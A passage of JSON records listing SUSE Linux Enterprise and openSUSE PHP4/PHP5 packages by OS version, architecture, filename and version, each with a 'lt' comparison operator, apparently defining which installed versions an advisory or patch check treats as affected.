"packageName": "php4-session", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-mbstring-5.0.4-9.17.ppc.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-xmlrpc-5.1.2-29.14.ppc.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-devel-5.1.2-29.14.ia64.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-ldap-5.1.2-29.14.x86_64.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-ldap-5.1.2-29.14.s390x.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "i586", "packageFilename": "php4-wddx-4.3.8-8.31.i586.rpm", "packageName": "php4-wddx", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "apache2-mod_php5-5.1.2-29.14.i586.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-soap-5.1.2-29.14.ia64.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "i586", "packageFilename": "php4-pear-4.3.10-14.28.i586.rpm", "packageName": "php4-pear", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-dom-5.1.2-29.14.s390x.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-pdo-5.1.2-29.14.ppc.rpm", "packageName": "php5-pdo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "x86_64", "packageFilename": "php4-imap-4.3.8-8.31.x86_64.rpm", "packageName": "php4-imap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-devel-5.1.2-29.14.s390x.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-imap-5.1.2-29.14.x86_64.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-imap-5.0.3-14.27.x86_64.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-mysql-5.1.2-29.14.x86_64.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-pear-5.1.2-29.14.i586.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-curl-5.1.2-29.14.i586.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-ldap-5.0.4-9.17.ppc.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "x86_64", "packageFilename": "php4-gd-4.4.0-6.18.x86_64.rpm", "packageName": "php4-gd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-ldap-5.0.3-14.27.i586.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-pear-5.1.2-29.14.ppc.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-gd-5.1.2-29.14.ppc.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "apache2-mod_php5-5.0.3-14.27.x86_64.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-wddx-5.1.2-29.14.ia64.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-iconv-5.0.3-14.27.i586.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "i586", "packageFilename": "apache2-mod_php4-4.3.10-14.28.i586.rpm", "packageName": "apache2-mod_php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-soap-5.1.2-29.14.x86_64.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-mysqli-5.1.2-29.14.x86_64.rpm", "packageName": "php5-mysqli", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-pgsql-5.1.2-29.14.i586.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "x86_64", "packageFilename": "php4-session-4.4.0-6.18.x86_64.rpm", "packageName": "php4-session", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-dom-5.1.2-29.14.ppc.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-ldap-5.1.2-29.14.ia64.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-mbstring-5.1.2-29.14.i586.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-wddx-5.1.2-29.14.i586.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "x86_64", "packageFilename": "php4-curl-4.4.0-6.18.x86_64.rpm", "packageName": "php4-curl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-ftp-5.1.2-29.14.s390x.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-devel-5.1.2-29.14.ppc.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "apache2-mod_php5-5.1.2-29.14.x86_64.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "ppc", "packageFilename": "php4-mbstring-4.4.0-6.18.ppc.rpm", "packageName": "php4-mbstring", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "x86_64", "packageFilename": "php4-devel-4.3.10-14.28.x86_64.rpm", "packageName": "php4-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-mysql-5.0.3-14.27.i586.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-pgsql-5.0.3-14.27.i586.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "i586", "packageFilename": "php4-curl-4.3.10-14.28.i586.rpm", "packageName": "php4-curl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-curl-5.1.2-29.14.s390x.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-mbstring-5.1.2-29.14.ppc.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "ppc", "packageFilename": "apache2-mod_php4-4.4.0-6.18.ppc.rpm", "packageName": "apache2-mod_php4", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-bcmath-5.1.2-29.14.ppc.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-ftp-5.1.2-29.14.ia64.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-5.1.2-29.14.x86_64.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-dom-5.1.2-29.14.ppc.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-wddx-5.0.3-14.27.x86_64.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "x86_64", "packageFilename": "php4-4.3.8-8.31.x86_64.rpm", "packageName": "php4", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-imap-5.1.2-29.14.ppc.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-dba-5.1.2-29.14.ia64.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-curl-5.1.2-29.14.ppc.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-wddx-5.1.2-29.14.ia64.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-pgsql-5.1.2-29.14.s390x.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-imap-5.1.2-29.14.ia64.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "x86_64", "packageFilename": "php4-gd-4.3.8-8.31.x86_64.rpm", "packageName": "php4-gd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "apache2-mod_php5-5.1.2-29.14.ppc.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "i586", "packageFilename": "php4-mbstring-4.3.10-14.28.i586.rpm", "packageName": "php4-mbstring", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-mbstring-5.1.2-29.14.x86_64.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-curl-5.1.2-29.14.x86_64.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-mysql-5.1.2-29.14.i586.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-mysql-5.1.2-29.14.ppc.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-dom-5.1.2-29.14.x86_64.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-exif-5.1.2-29.14.x86_64.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-dba-5.1.2-29.14.s390x.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "x86_64", "packageFilename": "php4-devel-4.4.0-6.18.x86_64.rpm", "packageName": "php4-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-mbstring-5.1.2-29.14.i586.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-mysql-5.1.2-29.14.ppc.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "x86_64", "packageFilename": "php4-session-4.3.10-14.28.x86_64.rpm", "packageName": "php4-session", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-5.1.2-29.14.ppc.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-pgsql-5.1.2-29.14.ia64.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-ftp-5.1.2-29.14.ia64.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-ftp-5.1.2-29.14.i586.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-pgsql-5.1.2-29.14.s390x.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-xmlrpc-5.0.4-9.17.i586.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-pear-5.1.2-29.14.ia64.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-fastcgi-5.1.2-29.14.i586.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "i586", "packageFilename": "php4-exif-4.3.8-8.31.i586.rpm", "packageName": "php4-exif", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-dba-5.0.3-14.27.x86_64.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-dom-5.1.2-29.14.i586.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-soap-5.1.2-29.14.i586.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-iconv-5.0.4-9.17.x86_64.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-dom-5.0.4-9.17.i586.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-gd-5.1.2-29.14.i586.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-xmlrpc-5.1.2-29.14.ppc.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-iconv-5.1.2-29.14.ia64.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-ftp-5.0.3-14.27.i586.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-mbstring-5.1.2-29.14.x86_64.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "9.3-7.12", "arch": "x86_64", "packageFilename": "php4-32bit-9.3-7.12.x86_64.rpm", "packageName": "php4-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-5.0.3-14.27.x86_64.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-pdo-5.1.2-29.14.ppc.rpm", "packageName": "php5-pdo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-xmlrpc-5.0.4-9.17.x86_64.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-mysqli-5.0.4-9.17.i586.rpm", "packageName": "php5-mysqli", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-gd-5.1.2-29.14.ia64.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "apache2-mod_php5-5.0.4-9.17.x86_64.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-fastcgi-5.0.4-9.17.ppc.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-bcmath-5.1.2-29.14.x86_64.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-exif-5.1.2-29.14.ppc.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-devel-5.1.2-29.14.ia64.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-pgsql-5.0.4-9.17.i586.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-pear-5.0.3-14.27.x86_64.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-soap-5.0.4-9.17.i586.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-exif-5.1.2-29.14.x86_64.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-devel-5.1.2-29.14.i586.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-bcmath-5.0.3-14.27.x86_64.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-dom-5.0.3-14.27.x86_64.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-imap-5.1.2-29.14.x86_64.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-dba-5.1.2-29.14.s390x.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "ppc", "packageFilename": "php4-pgsql-4.4.0-6.18.ppc.rpm", "packageName": "php4-pgsql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-fastcgi-5.0.3-14.27.x86_64.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-fastcgi-5.1.2-29.14.ia64.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-devel-5.0.3-14.27.x86_64.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-xmlrpc-5.1.2-29.14.ia64.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-fastcgi-5.1.2-29.14.s390x.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-dom-5.0.4-9.17.x86_64.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-imap-5.0.4-9.17.x86_64.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-wddx-5.1.2-29.14.x86_64.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-wddx-5.0.4-9.17.ppc.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-dom-5.0.3-14.27.i586.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-gd-5.1.2-29.14.ppc.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-mysql-5.1.2-29.14.s390x.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-ldap-5.1.2-29.14.ppc.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-pgsql-5.1.2-29.14.ppc.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "x86_64", "packageFilename": "php4-unixODBC-4.4.0-6.18.x86_64.rpm", "packageName": "php4-unixODBC", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-ldap-5.0.4-9.17.x86_64.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "i586", "packageFilename": "php4-exif-4.4.0-6.18.i586.rpm", "packageName": "php4-exif", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "x86_64", "packageFilename": "php4-exif-4.3.8-8.31.x86_64.rpm", "packageName": "php4-exif", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-curl-5.0.4-9.17.ppc.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "x86_64", "packageFilename": "php4-32bit-4.4.0-6.18.x86_64.rpm", "packageName": "php4-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "x86_64", "packageFilename": "php4-curl-4.3.10-14.28.x86_64.rpm", "packageName": "php4-curl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "ppc", "packageFilename": "php4-imap-4.4.0-6.18.ppc.rpm", "packageName": "php4-imap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", 